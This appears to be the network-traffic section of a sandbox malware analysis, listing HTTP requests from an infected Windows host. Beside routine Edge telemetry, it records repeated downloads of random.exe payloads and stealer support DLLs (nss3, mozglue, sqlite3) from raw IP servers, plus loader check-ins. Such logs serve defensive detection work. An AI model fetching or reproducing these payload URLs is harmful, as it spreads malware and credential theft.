Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.5734d85c965c30638bcf.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=20AFE78358386A423C1CF20559906BCB; _EDGE_S=F=1&SID=039D10DD67E8639C1D4A055B669B627C; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1738426789375&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a60b6144d49849d8a33be9c2127c5e35&activityId=a60b6144d49849d8a33be9c2127c5e35&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=20AFE78358386A423C1CF20559906BCB; _EDGE_S=F=1&SID=039D10DD67E8639C1D4A055B669B627C; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /b?rn=1738426789375&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=20AFE78358386A423C1CF20559906BCB&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /crx/blobs/ASuc5ohfQPNzGo5SSihcSk6msC8CUKw5id-p0KCEkBKwK2LS4AjdrDP0wa1qjzCTaTWEfyM52ADmUAdPETYA5vgD87UPEj6gyG11hjsvMLHGmzQgJ9F5D8s8Lo0Lbai5BQYAxlKa5esPJXukyaicyq83JwZ0HIWqzrjN/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_86_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 4.55sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 300sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=A60B6144D49849D8A33BE9C2127C5E35.RefC=2025-02-01T16:19:43Z; USRLOC=; MUID=20AFE78358386A423C1CF20559906BCB; MUIDB=20AFE78358386A423C1CF20559906BCB; _EDGE_S=F=1&SID=039D10DD67E8639C1D4A055B669B627C; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=43346508-d873-4c10-9d85-34cd5f3aac00; ai_session=mpt9ZXffk8sVp/0Fn6reHK\|1738426789371\|1738426789371; sptmarket_restored=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=A60B6144D49849D8A33BE9C2127C5E35.RefC=2025-02-01T16:19:43Z
Source: global traffic	HTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: /Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":24,"imageId":"BB1msOOW","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=A60B6144D49849D8A33BE9C2127C5E35.RefC=2025-02-01T16:19:43Z; USRLOC=; MUID=20AFE78358386A423C1CF20559906BCB; MUIDB=20AFE78358386A423C1CF20559906BCB; _EDGE_S=F=1&SID=039D10DD67E8639C1D4A055B669B627C; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=43346508-d873-4c10-9d85-34cd5f3aac00; ai_session=mpt9ZXffk8sVp/0Fn6reHK\|1738426789371\|1738426789371; sptmarket_restored=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=A60B6144D49849D8A33BE9C2127C5E35.RefC=2025-02-01T16:19:43Z
Source: global traffic	HTTP traffic detected: GET /b2?rn=1738426789375&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=20AFE78358386A423C1CF20559906BCB&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1A6c32eaa00d2ed679af8d01738426790; XID=1A6c32eaa00d2ed679af8d01738426790
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1738426789375&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a60b6144d49849d8a33be9c2127c5e35&activityId=a60b6144d49849d8a33be9c2127c5e35&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=4823B3BFCB3546BA8CAB3A152D4EED61&MUID=20AFE78358386A423C1CF20559906BCB HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=20AFE78358386A423C1CF20559906BCB; _EDGE_S=F=1&SID=039D10DD67E8639C1D4A055B669B627C; _EDGE_V=1; SM=T
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/martin1/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/notfinancing/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ZhnSMEmOyBahvsfTCosA1738232489?argument=0 HTTP/1.1Host: home.fivegg5th.topAccept: /
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sat, 01 Feb 2025 16:13:50 GMTIf-None-Match: "679e483e-1bcc00"
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /test/exe/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/SQL_gulong/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/Savelij_sL/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: dHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: sHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 185.215.113.97If-Modified-Since: Sat, 01 Feb 2025 15:29:56 GMTIf-None-Match: "679e3df4-1de400"
Source: global traffic	HTTP traffic detected: GET /files/Jz1e1/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/drainisback/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
